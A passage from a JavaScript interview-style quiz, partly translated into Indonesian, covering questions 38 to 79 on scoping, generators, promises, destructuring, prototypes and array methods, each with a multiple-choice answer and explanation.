try { throw new Error(); } catch (x) { (x = 1), (y = 2); console.log(x); } console.log(x); console.log(y); })(); ``` - A: `1` `undefined` `2` - B: `undefined` `undefined` `undefined` - C: `1` `1` `2` - D: `1` `undefined` `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The `catch` block receives the argument `x`. This is not the same `x` as the variable when we pass arguments. This variable `x` is block-scoped. Later, we set this block-scoped variable equal to `1`, and set the value of the variable `y`. Now, we log the block-scoped variable `x`, which is equal to `1`. Outside of the `catch` block, `x` is still `undefined`, and `y` is `2`. When we want to `console.log(x)` outside of the `catch` block, it returns `undefined`, and `y` returns `2`. </p> </details> --- ###### 39. Everything in JavaScript is either a... - A: primitive or object - B: function or object - C: trick question! only objects - D: number or object <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A JavaScript only has primitive types and objects. Primitive types are `boolean`, `null`, `undefined`, `bigint`, `number`, `string`, and `symbol`. What differentiates a primitive from an object is that primitives do not have any properties or methods; however, you'll note that `'foo'.toUpperCase()` evaluates to `'FOO'` and does not result in a `TypeError`. This is because when you try to access a property or method on a primitive like a string, JavaScript will implicitly wrap the object using one of the wrapper classes, i.e. `String`, and then immediately discard the wrapper after the expression evaluates. All primitives except for `null` and `undefined` exhibit this behaviour. </p> </details> --- ###### 40. Apa yang akan tampil? ```javascript [[0, 1], [2, 3]].reduce( (acc, cur) => { return acc.concat(cur); }, [1, 2], ); ``` - A: `[0, 1, 2, 3, 1, 2]` - B: `[6, 1, 2]` - C: `[1, 2, 0, 1, 2, 3]` - D: `[1, 2, 6]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C `[1, 2]` is our initial value. This is the value we start with, and the value of the very first `acc`. During the first round, `acc` is `[1,2]`, and `cur` is `[0, 1]`. We concatenate them, which results in `[1, 2, 0, 1]`. Then, `[1, 2, 0, 1]` is `acc` and `[2, 3]` is `cur`. We concatenate them, and get `[1, 2, 0, 1, 2, 3]` </p> </details> --- ###### 41. Apa yang akan tampil? ```javascript !!null; !!''; !!1; ``` - A: `false` `true` `false` - B: `false` `false` `true` - C: `false` `true` `true` - D: `true` `true` `false` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B `null` is falsy. `!null` returns `true`. `!true` returns `false`. `""` is falsy. `!""` returns `true`. `!true` returns `false`. `1` is truthy. `!1` returns `false`. `!false` returns `true`. </p> </details> --- ###### 42. What does the `setInterval` method return in the browser? ```javascript setInterval(() => console.log('Hi'), 1000); ``` - A: a unique id - B: the amount of milliseconds specified - C: the passed function - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Itu adalah mengembalikan sebuah id unik. id unik dapat digunakan untuk menghapus interval dengan menggunakan fungsi clearInterval() </p> </details> --- ###### 43. What does this return? ```javascript [...'Lydia']; ``` - A: `["L", "y", "d", "i", "a"]` - B: `["Lydia"]` - C: `[[], "Lydia"]` - D: `[["L", "y", "d", "i", "a"]]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Sebuah string adalah iterable. Operator memetakan setiap karakter dari sebuah iterable ke dalam satu elemen. </p> </details> --- ###### 44. Apa yang akan tampil? ```javascript function* generator(i) { yield i; yield i * 2; } const gen = generator(10); console.log(gen.next().value); console.log(gen.next().value); ``` - A: `[0, 10], [10, 20]` - B: `20, 20` - C: `10, 20` - D: `0, 10 dan 10, 20` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Regular functions cannot be stopped mid-way after invocation. However, a generator function can be "stopped" midway, and later continue from where it stopped. Every time a generator function encounters a `yield` keyword, the function yields the value specified after it. Note that the generator function in that case doesn’t _return_ the value, it _yields_ the value. First, we initialize the generator function with `i` equal to `10`. We invoke the generator function using the `next()` method. The first time we invoke the generator function, `i` is equal to `10`. It encounters the first `yield` keyword: it yields the value of `i`. The generator is now "paused", and `10` gets logged. Then, we invoke the function again with the `next()` method. It starts to continue where it stopped previously, still with `i` equal to `10`. Now, it encounters the next `yield` keyword, and yields `i * 2`. `i` is equal to `10`, so it returns `10 * 2`, which is `20`. This results in `10, 20`. </p> </details> --- ###### 45. What does this return? ```javascript const firstPromise = new Promise((res, rej) => { setTimeout(res, 500, 'one'); }); const secondPromise = new Promise((res, rej) => { setTimeout(res, 100, 'two'); }); Promise.race([firstPromise, secondPromise]).then(res => console.log(res)); ``` - A: `"one"` - B: `"two"` - C: `"two" "one"` - D: `"one" "two"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B When we pass multiple promises to the `Promise.race` method, it resolves/rejects the _first_ promise that resolves/rejects. To the `setTimeout` method, we pass a timer: 500ms for the first promise (`firstPromise`), and 100ms for the second promise (`secondPromise`). This means that the `secondPromise` resolves first with the value of `'two'`. `res` now holds the value of `'two'`, which gets logged. </p> </details> --- ###### 46. Apa yang akan tampil? ```javascript let person = { name: 'Lydia' }; const members = [person]; person = null; console.log(members); ``` - A: `null` - B: `[null]` - C: `[{}]` - D: `[{ name: "Lydia" }]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D First, we declare a variable `person` with the value of an object that has a `name` property. <img src="https://i.imgur.com/TML1MbS.png" width="200"> Then, we declare a variable called `members`. We set the first element of that array equal to the value of the `person` variable. Objects interact by _reference_ when setting them equal to each other. When you assign a reference from one variable to another, you make a _copy_ of that reference. (note that they don't have the _same_ reference!) <img src="https://i.imgur.com/FSG5K3F.png" width="300"> Then, we set the variable `person` equal to `null`. <img src="https://i.imgur.com/sYjcsMT.png" width="300"> We are only modifying the value of the `person` variable, and not the first element in the array, since that element has a different (copied) reference to the object. The first element in `members` still holds its reference to the original object. When we log the `members` array, the first element still holds the value of the object, which gets logged. </p> </details> --- ###### 47. Apa yang akan tampil? ```javascript const person = { name: 'Lydia', age: 21, }; for (const item in person) { console.log(item); } ``` - A: `{ name: "Lydia" }, { age: 21 }` - B: `"name", "age"` - C: `"Lydia", 21` - D: `["name", "Lydia"], ["age", 21]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With a `for-in` loop, we can iterate through object keys, in this case `name` and `age`. Under the hood, object keys are strings (if they're not a Symbol). On every loop, we set the value of `item` equal to the current key it’s iterating over. First, `item` is equal to `name`, and gets logged. Then, `item` is equal to `age`, which gets logged. </p> </details> --- ###### 48. Apa yang akan tampil? ```javascript console.log(3 + 4 + '5'); ``` - A: `"345"` - B: `"75"` - C: `12` - D: `"12"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B Operator associativity is the order in which the compiler evaluates the expressions, either left-to-right or right-to-left. This only happens if all operators have the _same_ precedence. We only have one type of operator: `+`. For addition, the associativity is left-to-right. `3 + 4` gets evaluated first. This results in the number `7`. `7 + '5'` results in `"75"` because of coercion. JavaScript converts the number `7` into a string, see question 15. We can concatenate two strings using the `+`operator. `"7" + "5"` results in `"75"`. </p> </details> --- ###### 49. What's the value of `num`? ```javascript const num = parseInt('7*6', 10); ``` - A: `42` - B: `"42"` - C: `7` - D: `NaN` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Only the first numbers in the string is returned. Based on the _radix_ (the second argument in order to specify what type of number we want to parse it to: base 10, hexadecimal, octal, binary, etc.), the `parseInt` checks whether the characters in the string are valid. Once it encounters a character that isn't a valid number in the radix, it stops parsing and ignores the following characters. `*` is not a valid number. It only parses `"7"` into the decimal `7`. `num` now holds the value of `7`. </p> </details> --- ###### 50. What's the output`? ```javascript [1, 2, 3].map(num => { if (typeof num === 'number') return; return num * 2; }); ``` - A: `[]` - B: `[null, null, null]` - C: `[undefined, undefined, undefined]` - D: `[ 3 x empty ]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C When mapping over the array, the value of `num` is equal to the element it’s currently looping over. In this case, the elements are numbers, so the condition of the if statement `typeof num === "number"` returns `true`. The map function creates a new array and inserts the values returned from the function. However, we don’t return a value. When we don’t return a value from the function, the function returns `undefined`. For every element in the array, the function block gets called, so for each element we return `undefined`. </p> </details> --- ###### 51. Apa yang akan tampil? ```javascript function getInfo(member, year) { member.name = 'Lydia'; year = '1998'; } const person = { name: 'Sarah' }; const birthYear = '1997'; getInfo(person, birthYear); console.log(person, birthYear); ``` - A: `{ name: "Lydia" }, "1997"` - B: `{ name: "Sarah" }, "1998"` - C: `{ name: "Lydia" }, "1998"` - D: `{ name: "Sarah" }, "1997"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Arguments are passed by _value_, unless their value is an object, then they're passed by _reference_. `birthYear` is passed by value, since it's a string, not an object. When we pass arguments by value, a _copy_ of that value is created (see question 46). The variable `birthYear` has a reference to the value `"1997"`. The argument `year` also has a reference to the value `"1997"`, but it's not the same value as `birthYear` has a reference to. When we update the value of `year` by setting `year` equal to `"1998"`, we are only updating the value of `year`. `birthYear` is still equal to `"1997"`. The value of `person` is an object. The argument `member` has a (copied) reference to the _same_ object. When we modify a property of the object `member` has a reference to, the value of `person` will also be modified, since they both have a reference to the same object. `person`'s `name` property is now equal to the value `"Lydia"` </p> </details> --- ###### 52. Apa yang akan tampil? ```javascript function greeting() { throw 'Hello world!'; } function sayHi() { try { const data = greeting(); console.log('It worked!', data); } catch (e) { console.log('Oh no an error:', e); } } sayHi(); ``` - A: `It worked! Hello world!` - B: `Oh no an error: undefined` - C: `SyntaxError: can only throw Error objects` - D: `Oh no an error: Hello world!` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D With the `throw` statement, we can create custom errors. With this statement, you can throw exceptions. An exception can be a <b>string</b>, a <b>number</b>, a <b>boolean</b> or an <b>object</b>. In this case, our exception is the string `'Hello world'`. With the `catch` statement, we can specify what to do if an exception is thrown in the `try` block. An exception is thrown: the string `'Hello world'`. `e` is now equal to that string, which we log. This results in `'Oh an error: Hello world'`. </p> </details> --- ###### 53. Apa yang akan tampil? ```javascript function Car() { this.make = 'Lamborghini'; return { make: 'Maserati' }; } const myCar = new Car(); console.log(myCar.make); ``` - A: `"Lamborghini"` - B: `"Maserati"` - C: `ReferenceError` - D: `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B When you return a property, the value of the property is equal to the _returned_ value, not the value set in the constructor function. We return the string `"Maserati"`, so `myCar.make` is equal to `"Maserati"`. </p> </details> --- ###### 54. Apa yang akan tampil? ```javascript (() => { let x = (y = 10); })(); console.log(typeof x); console.log(typeof y); ``` - A: `"undefined", "number"` - B: `"number", "number"` - C: `"object", "number"` - D: `"number", "undefined"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A `let x = y = 10;` is actually shorthand for: ```javascript y = 10; let x = y; ``` When we set `y` equal to `10`, we actually add a property `y` to the global object (`window` in browser, `global` in Node). In a browser, `window.y` is now equal to `10`. Then, we declare a variable `x` with the value of `y`, which is `10`. Variables declared with the `let` keyword are _block scoped_, they are only defined within the block they're declared in; the immediately-invoked function (IIFE) in this case. When we use the `typeof` operator, the operand `x` is not defined: we are trying to access `x` outside of the block it's declared in. This means that `x` is not defined. Values who haven't been assigned a value or declared are of type `"undefined"`. `console.log(typeof x)` returns `"undefined"`. However, we created a global variable `y` when setting `y` equal to `10`. This value is accessible anywhere in our code. `y` is defined, and holds a value of type `"number"`. `console.log(typeof y)` returns `"number"`. </p> </details> --- ###### 55. Apa yang akan tampil? ```javascript class Dog { constructor(name) { this.name = name; } } Dog.prototype.bark = function() { console.log(`Woof I am ${this.name}`); }; const pet = new Dog('Mara'); pet.bark(); delete Dog.prototype.bark; pet.bark(); ``` - A: `"Woof I am Mara"`, `TypeError` - B: `"Woof I am Mara"`, `"Woof I am Mara"` - C: `"Woof I am Mara"`, `undefined` - D: `TypeError`, `TypeError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A We can delete properties from objects using the `delete` keyword, also on the prototype. By deleting a property on the prototype, it is not available anymore in the prototype chain. In this case, the `bark` function is not available anymore on the prototype after `delete Dog.prototype.bark`, yet we still try to access it. When we try to invoke something that is not a function, a `TypeError` is thrown. In this case `TypeError: pet.bark is not a function`, since `pet.bark` is `undefined`. </p> </details> --- ###### 56. Apa yang akan tampil? ```javascript const set = new Set([1, 1, 2, 3, 4]); console.log(set); ``` - A: `[1, 1, 2, 3, 4]` - B: `[1, 2, 3, 4]` - C: `{1, 1, 2, 3, 4}` - D: `{1, 2, 3, 4}` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D The `Set` object is a collection of _unique_ values: a value can only occur once in a set. We passed the iterable `[1, 1, 2, 3, 4]` with a duplicate value `1`. Since we cannot have two of the same values in a set, one of them is removed. This results in `{1, 2, 3, 4}`. </p> </details> --- ###### 57. Apa yang akan tampil? ```javascript // counter.js let counter = 10; export default counter; ``` ```javascript // index.js import myCounter from './counter'; myCounter += 1; console.log(myCounter); ``` - A: `10` - B: `11` - C: `Error` - D: `NaN` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C Modul yang diimpor adalah _read-only_: Anda tidak dapat mengubah modul yang diimpor. Hanya modul yang mengekspornya yang dapat mengubah nilainya. Ketika kita mencoba untuk menambah nilai `myCounter`, itu melemparkan kesalahan: `myCounter` adalah baca-saja dan tidak dapat dimodifikasi. </p> </details> --- ###### 58. Apa yang akan tampil? ```javascript const name = 'Lydia'; age = 21; console.log(delete name); console.log(delete age); ``` - A: `false`, `true` - B: `"Lydia"`, `21` - C: `true`, `true` - D: `undefined`, `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The `delete` operator returns a boolean value: `true` on a successful deletion, else it'll return `false`. However, variables declared with the `var`, `const` or `let` keyword cannot be deleted using the `delete` operator. The `name` variable was declared with a `const` keyword, so its deletion is not successful: `false` is returned. When we set `age` equal to `21`, we actually added a property called `age` to the global object. You can successfully delete properties from objects this way, also the global object, so `delete age` returns `true`. </p> </details> --- ###### 59. Apa yang akan tampil? ```javascript const numbers = [1, 2, 3, 4, 5]; const [y] = numbers; console.log(y); ``` - A: `[[1, 2, 3, 4, 5]]` - B: `[1, 2, 3, 4, 5]` - C: `1` - D: `[1]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C We can unpack values from arrays or properties from objects through destructuring. For example: ```javascript [a, b] = [1, 2]; ``` <img src="https://i.imgur.com/ADFpVop.png" width="200"> The value of `a` is now `1`, and the value of `b` is now `2`. What we actually did in the question, is: ```javascript [y] = [1, 2, 3, 4, 5]; ``` <img src="https://i.imgur.com/NzGkMNk.png" width="200"> This means that the value of `y` is equal to the first value in the array, which is the number `1`. When we log `y`, `1` is returned. </p> </details> --- ###### 60. Apa yang akan tampil? ```javascript const user = { name: 'Lydia', age: 21 }; const admin = { admin: true, ...user }; console.log(admin); ``` - A: `{ admin: true, user: { name: "Lydia", age: 21 } }` - B: `{ admin: true, name: "Lydia", age: 21 }` - C: `{ admin: true, user: ["Lydia", 21] }` - D: `{ admin: true }` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B It's possible to combine objects using the spread operator `...`. It lets you create copies of the key/value pairs of one object, and add them to another object. In this case, we create copies of the `user` object, and add them to the `admin` object. The `admin` object now contains the copied key/value pairs, which results in `{ admin: true, name: "Lydia", age: 21 }`. </p> </details> --- ###### 61. Apa yang akan tampil? ```javascript const person = { name: 'Lydia' }; Object.defineProperty(person, 'age', { value: 21 }); console.log(person); console.log(Object.keys(person)); ``` - A: `{ name: "Lydia", age: 21 }`, `["name", "age"]` - B: `{ name: "Lydia", age: 21 }`, `["name"]` - C: `{ name: "Lydia"}`, `["name", "age"]` - D: `{ name: "Lydia"}`, `["age"]` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the `defineProperty` method, we can add new properties to an object, or modify existing ones. When we add a property to an object using the `defineProperty` method, they are by default _not enumerable_. The `Object.keys` method returns all _enumerable_ property names from an object, in this case only `"name"`. Properties added using the `defineProperty` method are immutable by default. You can override this behavior using the `writable`, `configurable` and `enumerable` properties. This way, the `defineProperty` method gives you a lot more control over the properties you're adding to an object. </p> </details> --- ###### 62. Apa yang akan tampil? ```javascript const settings = { username: 'lydiahallie', level: 19, health: 90, }; const data = JSON.stringify(settings, ['level', 'health']); console.log(data); ``` - A: `"{"level":19, "health":90}"` - B: `"{"username": "lydiahallie"}"` - C: `"["level", "health"]"` - D: `"{"username": "lydiahallie", "level":19, "health":90}"` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The second argument of `JSON.stringify` is the _replacer_. The replacer can either be a function or an array, and lets you control what and how the values should be stringified. If the replacer is an _array_, only the property names included in the array will be added to the JSON string. In this case, only the properties with the names `"level"` and `"health"` are included, `"username"` is excluded. `data` is now equal to `"{"level":19, "health":90}"`. If the replacer is a _function_, this function gets called on every property in the object you're stringifying. The value returned from this function will be the value of the property when it's added to the JSON string. If the value is `undefined`, this property is excluded from the JSON string. </p> </details> --- ###### 63. Apa yang akan tampil? ```javascript let num = 10; const increaseNumber = () => num++; const increasePassedNumber = number => number++; const num1 = increaseNumber(); const num2 = increasePassedNumber(num1); console.log(num1); console.log(num2); ``` - A: `10`, `10` - B: `10`, `11` - C: `11`, `11` - D: `11`, `12` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A The unary operator `++` _first returns_ the value of the operand, _then increments_ the value of the operand. The value of `num1` is `10`, since the `increaseNumber` function first returns the value of `num`, which is `10`, and only increments the value of `num` afterwards. `num2` is `10`, since we passed `num1` to the `increasePassedNumber`. `number` is equal to `10`(the value of `num1`. Again, the unary operator `++` _first returns_ the value of the operand, _then increments_ the value of the operand. The value of `number` is `10`, so `num2` is equal to `10`. </p> </details> --- ###### 64. Apa yang akan tampil? ```javascript const value = { number: 10 }; const multiply = (x = { ...value }) => { console.log((x.number *= 2)); }; multiply(); multiply(); multiply(value); multiply(value); ``` - A: `20`, `40`, `80`, `160` - B: `20`, `40`, `20`, `40` - C: `20`, `20`, `20`, `40` - D: `NaN`, `NaN`, `20`, `40` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C In ES6, we can initialize parameters with a default value. The value of the parameter will be the default value, if no other value has been passed to the function, or if the value of the parameter is `"undefined"`. In this case, we spread the properties of the `value` object into a new object, so `x` has the default value of `{ number: 10 }`. The default argument is evaluated at _call time_! Every time we call the function, a _new_ object is created. We invoke the `multiply` function the first two times without passing a value: `x` has the default value of `{ number: 10 }`. We then log the multiplied value of that number, which is `20`. The third time we invoke multiply, we do pass an argument: the object called `value`. The `*=` operator is actually shorthand for `x.number = x.number * 2`: we modify the value of `x.number`, and log the multiplied value `20`. The fourth time, we pass the `value` object again. `x.number` was previously modified to `20`, so `x.number *= 2` logs `40`. </p> </details> --- ###### 65. Apa yang akan tampil? ```javascript [1, 2, 3, 4].reduce((x, y) => console.log(x, y)); ``` - A: `1` `2` and `3` `3` and `6` `4` - B: `1` `2` and `2` `3` and `3` `4` - C: `1` `undefined` and `2` `undefined` and `3` `undefined` and `4` `undefined` - D: `1` `2` and `undefined` `3` and `undefined` `4` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D The first argument that the `reduce` method receives is the _accumulator_, `x` in this case. The second argument is the _current value_, `y`. With the reduce method, we execute a callback function on every element in the array, which could ultimately result in one single value. In this example, we are not returning any values, we are simply logging the values of the accumulator and the current value. The value of the accumulator is equal to the previously returned value of the callback function. If you don't pass the optional `initialValue` argument to the `reduce` method, the accumulator is equal to the first element on the first call. On the first call, the accumulator (`x`) is `1`, and the current value (`y`) is `2`. We don't return from the callback function, we log the accumulator and current value: `1` and `2` get logged. If you don't return a value from a function, it returns `undefined`. On the next call, the accumulator is `undefined`, and the current value is `3`. `undefined` and `3` get logged. On the fourth call, we again don't return from the callback function. The accumulator is again `undefined`, and the current value is `4`. `undefined` and `4` get logged. </p> </details> --- ###### 66. With which constructor can we successfully extend the `Dog` class? ```javascript class Dog { constructor(name) { this.name = name; } }; class Labrador extends Dog { // 1 constructor(name, size) { this.size = size; } // 2 constructor(name, size) { super(name); this.size = size; } // 3 constructor(size) { super(name); this.size = size; } // 4 constructor(name, size) { this.name = name; this.size = size; } }; ``` - A: 1 - B: 2 - C: 3 - D: 4 <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B In a derived class, you cannot access the `this` keyword before calling `super`. If you try to do that, it will throw a ReferenceError: 1 and 4 would throw a reference error. With the `super` keyword, we call that parent class's constructor with the given arguments. The parent's constructor receives the `name` argument, so we need to pass `name` to `super`. The `Labrador` class receives two arguments, `name` since it extends `Dog`, and `size` as an extra property on the `Labrador` class. They both need to be passed to the constructor function on `Labrador`, which is done correctly using constructor 2. </p> </details> --- ###### 67. Apa yang akan tampil? ```javascript // index.js console.log('running index.js'); import { sum } from './sum.js'; console.log(sum(1, 2)); // sum.js console.log('running sum.js'); export const sum = (a, b) => a + b; ``` - A: `running index.js`, `running sum.js`, `3` - B: `running sum.js`, `running index.js`, `3` - C: `running sum.js`, `3`, `running index.js` - D: `running index.js`, `undefined`, `running sum.js` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B With the `import` keyword, all imported modules are _pre-parsed_. This means that the imported modules get run _first_, the code in the file which imports the module gets executed _after_. This is a difference between `require()` in CommonJS and `import`! With `require()`, you can load dependencies on demand while the code is being run. If we would have used `require` instead of `import`, `running index.js`, `running sum.js`, `3` would have been logged to the console. </p> </details> --- ###### 68. Apa yang akan tampil? ```javascript console.log(Number(2) === Number(2)); console.log(Boolean(false) === Boolean(false)); console.log(Symbol('foo') === Symbol('foo')); ``` - A: `true`, `true`, `false` - B: `false`, `true`, `false` - C: `true`, `false`, `true` - D: `true`, `true`, `true` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A Every Symbol is entirely unique. The purpose of the argument passed to the Symbol is to give the Symbol a description. The value of the Symbol is not dependent on the passed argument. As we test equality, we are creating two entirely new symbols: the first `Symbol('foo')`, and the second `Symbol('foo')`. These two values are unique and not equal to each other, `Symbol('foo') === Symbol('foo')` returns `false`. </p> </details> --- ###### 69. Apa yang akan tampil? ```javascript const name = 'Lydia Hallie'; console.log(name.padStart(13)); console.log(name.padStart(2)); ``` - A: `"Lydia Hallie"`, `"Lydia Hallie"` - B: `" Lydia Hallie"`, `" Lydia Hallie"` (`"[13x whitespace]Lydia Hallie"`, `"[2x whitespace]Lydia Hallie"`) - C: `" Lydia Hallie"`, `"Lydia Hallie"` (`"[1x whitespace]Lydia Hallie"`, `"Lydia Hallie"`) - D: `"Lydia Hallie"`, `"Lyd"`, <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C With the `padStart` method, we can add padding to the beginning of a string. The value passed to this method is the _total_ length of the string together with the padding. The string `"Lydia Hallie"` has a length of `12`. `name.padStart(13)` inserts 1 space at the start of the string, because 12 + 1 is 13. If the argument passed to the `padStart` method is smaller than the length of the array, no padding will be added. </p> </details> --- ###### 70. Apa yang akan tampil? ```javascript console.log('🥑' + '💻'); ``` - A: `"🥑💻"` - B: `257548` - C: A string containing their code points - D: Error <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With the `+` operator, you can concatenate strings. In this case, we are concatenating the string `"🥑"` with the string `"💻"`, resulting in `"🥑💻"`. </p> </details> --- ###### 71. How can we log the values that are commented out after the console.log statement? ```javascript function* startGame() { const answer = yield 'Do you love JavaScript?'; if (answer !== 'Yes') { return "Oh wow... Guess we're gone here"; } return 'JavaScript loves you back ❤️'; } const game = startGame(); console.log(/* 1 */); // Do you love JavaScript? console.log(/* 2 */); // JavaScript loves you back ❤️ ``` - A: `game.next("Yes").value` dan `game.next().value` - B: `game.next.value("Yes")` dan `game.next.value()` - C: `game.next().value` dan `game.next("Yes").value` - D: `game.next.value()` dan `game.next.value("Yes")` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C A generator function "pauses" its execution when it sees the `yield` keyword. First, we have to let the function yield the string "Do you love JavaScript?", which can be done by calling `game.next().value`. Every line is executed, until it finds the first `yield` keyword. There is a `yield` keyword on the first line within the function: the execution stops with the first yield! _This means that the variable `answer` is not defined yet!_ When we call `game.next("Yes").value`, the previous `yield` is replaced with the value of the parameters passed to the `next()` function, `"Yes"` in this case. The value of the variable `answer` is now equal to `"Yes"`. The condition of the if-statement returns `false`, and `JavaScript loves you back ❤️` gets logged. </p> </details> --- ###### 72. Apa yang akan tampil? ```javascript console.log(String.raw`Hello\nworld`); ``` - A: `Hello world!` - B: `Hello` <br />&nbsp; &nbsp; &nbsp;`world` - C: `Hello\nworld` - D: `Hello\n` <br /> &nbsp; &nbsp; &nbsp;`world` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C `String.raw` returns a string where the escapes (`\n`, `\v`, `\t` etc.) are ignored! Backslashes can be an issue since you could end up with something like: `` const path = `C:\Documents\Projects\table.html` `` Which would result in: `"C:DocumentsProjects able.html"` With `String.raw`, it would simply ignore the escape and print: `C:\Documents\Projects\table.html` In this case, the string is `Hello\nworld`, which gets logged. </p> </details> --- ###### 73. Apa yang akan tampil? ```javascript async function getData() { return await Promise.resolve('I made it!'); } const data = getData(); console.log(data); ``` - A: `"I made it!"` - B: `Promise {<resolved>: "I made it!"}` - C: `Promise {<pending>}` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C An async function always returns a promise. The `await` still has to wait for the promise to resolve: a pending promise gets returned when we call `getData()` in order to set `data` equal to it. If we wanted to get access to the resolved value `"I made it"`, we could have used the `.then()` method on `data`: `data.then(res => console.log(res))` This would've logged `"I made it!"` </p> </details> --- ###### 74. Apa yang akan tampil? ```javascript function addToList(item, list) { return list.push(item); } const result = addToList('apple', ['banana']); console.log(result); ``` - A: `['apple', 'banana']` - B: `2` - C: `true` - D: `undefined` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B The `.push()` method returns the _length_ of the new array! Previously, the array contained one element (the string `"banana"`) and had a length of `1`. After adding the string `"apple"` to the array, the array contains two elements, and has a length of `2`. This gets returned from the `addToList` function. The `push` method modifies the original array. If you wanted to return the _array_ from the function rather than the _length of the array_, you should have returned `list` after pushing `item` to it. </p> </details> --- ###### 75. Apa yang akan tampil? ```javascript const box = { x: 10, y: 20 }; Object.freeze(box); const shape = box; shape.x = 100; console.log(shape); ``` - A: `{ x: 100, y: 20 }` - B: `{ x: 10, y: 20 }` - C: `{ x: 100 }` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: B `Object.freeze` makes it impossible to add, remove, or modify properties of an object (unless the property's value is another object). When we create the variable `shape` and set it equal to the frozen object `box`, `shape` also refers to a frozen object. You can check whether an object is frozen by using `Object.isFrozen`. In this case, `Object.isFrozen(shape)` returns true, since the variable `shape` has a reference to a frozen object. Since `shape` is frozen, and since the value of `x` is not an object, we cannot modify the property `x`. `x` is still equal to `10`, and `{ x: 10, y: 20 }` gets logged. </p> </details> --- ###### 76. Apa yang akan tampil? ```javascript const { name: myName } = { name: 'Lydia' }; console.log(name); ``` - A: `"Lydia"` - B: `"myName"` - C: `undefined` - D: `ReferenceError` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: D When we unpack the property `name` from the object on the right-hand side, we assign its value `"Lydia"` to a variable with the name `myName`. With `{ name: myName }`, we tell JavaScript that we want to create a new variable called `myName` with the value of the `name` property on the right-hand side. Since we try to log `name`, a variable that is not defined, a ReferenceError gets thrown. </p> </details> --- ###### 77. Is this a pure function? ```javascript function sum(a, b) { return a + b; } ``` - A: Yes - B: No <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A A pure function is a function that _always_ returns the same result, if the same arguments are passed. The `sum` function always returns the same result. If we pass `1` and `2`, it will _always_ return `3` without side effects. If we pass `5` and `10`, it will _always_ return `15`, and so on. This is the definition of a pure function. </p> </details> --- ###### 78. What is the output? ```javascript const add = () => { const cache = {}; return num => { if (num in cache) { return `From cache! ${cache[num]}`; } else { const result = num + 10; cache[num] = result; return `Calculated! ${result}`; } }; }; const addFunction = add(); console.log(addFunction(10)); console.log(addFunction(10)); console.log(addFunction(5 * 2)); ``` - A: `Calculated! 20` `Calculated! 20` `Calculated! 20` - B: `Calculated! 20` `From cache! 20` `Calculated! 20` - C: `Calculated! 20` `From cache! 20` `From cache! 20` - D: `Calculated! 20` `From cache! 20` `Error` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: C The `add` function is a _memoized_ function. With memoization, we can cache the results of a function in order to speed up its execution. In this case, we create a `cache` object that stores the previously returned values. If we call the `addFunction` function again with the same argument, it first checks whether it has already gotten that value in its cache. If that's the case, the caches value will be returned, which saves on execution time. Else, if it's not cached, it will calculate the value and store it afterwards. We call the `addFunction` function three times with the same value: on the first invocation, the value of the function when `num` is equal to `10` isn't cached yet. The condition of the if-statement `num in cache` returns `false`, and the else block gets executed: `Calculated! 20` gets logged, and the value of the result gets added to the cache object. `cache` now looks like `{ 10: 20 }`. The second time, the `cache` object contains the value that gets returned for `10`. The condition of the if-statement `num in cache` returns `true`, and `'From cache! 20'` gets logged. The third time, we pass `5 * 2` to the function which gets evaluated to `10`. The `cache` object contains the value that gets returned for `10`. The condition of the if-statement `num in cache` returns `true`, and `'From cache! 20'` gets logged. </p> </details> --- ###### 79. What is the output? ```javascript const myLifeSummedUp = ['☕', '💻', '🍷', '🍫']; for (let item in myLifeSummedUp) { console.log(item); } for (let item of myLifeSummedUp) { console.log(item); } ``` - A: `0` `1` `2` `3` and `"☕"` `"💻"` `"🍷"` `"🍫"` - B: `"☕"` `"💻"` `"🍷"` `"🍫"` and `"☕"` `"💻"` `"🍷"` `"🍫"` - C: `"☕"` `"💻"` `"🍷"` `"🍫"` and `0` `1` `2` `3` - D: `0` `1` `2` `3` and `{0: "☕", 1: "💻", 2: "🍷", 3: "🍫"}` <details><summary><b>Jawaban</b></summary> <p> #### Jawaban: A With a _for-in_ loop, we can iterate over **enumerable** properties. In an array, the enumerable properties are the "keys" of array elements, which are actually their indexes. You could see an array as: `{0: "☕", 1: "💻", 2: "🍷", 3: "🍫"}` Where the keys are the enumerable properties. 